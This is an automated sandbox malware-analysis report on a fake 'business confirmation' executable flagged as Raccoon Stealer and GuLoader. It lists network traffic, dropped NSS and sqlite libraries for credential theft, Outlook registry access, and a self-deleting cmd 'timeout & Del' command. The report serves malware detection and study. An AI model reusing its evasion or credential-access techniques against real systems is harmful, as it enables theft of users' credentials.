Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000003.839087627.0000000000A34000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443

Source: unknown	HTTPS traffic detected: 111.67.28.15:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.4:49743 version: TLS 1.2

Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798629979.000000000076A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match

File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Process Stats: CPU usage > 98%

Source: sqlite3.dll.4.dr

Static PE information: Number of sections : 18 > 10

Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/67@2/3

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

File created: C:\Users\user\AppData\LocalLow\sqlite3.dll

Jump to behavior

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Mutant created: \Sessions\1\BaseNamedObjects\uiabfqwfuuser
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

File created: C:\Users\user\AppData\Local\Temp\~DF4AE595A1013A60B4.TMP

Jump to behavior

Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: softokn3.dll.4.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.4.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.4.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.4.dr	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.4.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.4.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: sqlite3.dll.4.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: unknown	Process created: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process created: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK	Jump to behavior

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Jump to behavior

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.4.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.4.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854419635.000000006D280000.00000002.00020000.sdmp, nss3.dll.4.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.4.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.4.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.4.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.4.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.4.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.4.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.4.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.4.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.4.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.4.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.4.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.4.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.854118774.000000006D159000.00000002.00020000.sdmp, mozglue.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.4.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.4.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.4.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.4.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.4.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.4.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.4.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.4.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.4.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.4.dr

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

Yara detected VB6 Downloader Generic

Show sources

Source: Yara match

File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

Source: sqlite3.dll.4.dr	Static PE information: section name: /4
Source: sqlite3.dll.4.dr	Static PE information: section name: /19
Source: sqlite3.dll.4.dr	Static PE information: section name: /31
Source: sqlite3.dll.4.dr	Static PE information: section name: /45
Source: sqlite3.dll.4.dr	Static PE information: section name: /57
Source: sqlite3.dll.4.dr	Static PE information: section name: /70
Source: sqlite3.dll.4.dr	Static PE information: section name: /81
Source: sqlite3.dll.4.dr	Static PE information: section name: /92

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D2613 push edx; ret	0_2_005D2641
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D1054 push edx; ret	0_2_005D1081
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D2854 push edx; ret	0_2_005D2881
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D4054 push edx; ret	0_2_005D4081
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D5854 push edx; ret	0_2_005D5881
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D7054 push edx; ret	0_2_005D7081
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D6844 push edx; ret	0_2_005D6871
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D0843 push edx; ret	0_2_005D0871
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D2043 push edx; ret	0_2_005D2071
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D3843 push edx; ret	0_2_005D3871
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D5043 push edx; ret	0_2_005D5071
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D0878 push edx; ret	0_2_005D08A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D6875 push edx; ret	0_2_005D68A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D2074 push edx; ret	0_2_005D20A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D3874 push edx; ret	0_2_005D38A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D5074 push edx; ret	0_2_005D50A1
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D0068 push edx; ret	0_2_005D0091
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D6065 push edx; ret	0_2_005D6091
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D3063 push edx; ret	0_2_005D3091
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D1863 push edx; ret	0_2_005D1891
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D4863 push edx; ret	0_2_005D4891
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D0818 push edx; ret	0_2_005D0841
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D6814 push edx; ret	0_2_005D6841
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D3813 push edx; ret	0_2_005D3841
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D2013 push edx; ret	0_2_005D2041
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D5013 push edx; ret	0_2_005D5041
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D0008 push edx; ret	0_2_005D0031
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D6004 push edx; ret	0_2_005D6031
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D4803 push edx; ret	0_2_005D4831
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D3003 push edx; ret	0_2_005D3031
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	Code function: 0_2_005D1803 push edx; ret	0_2_005D1831

Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe	File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
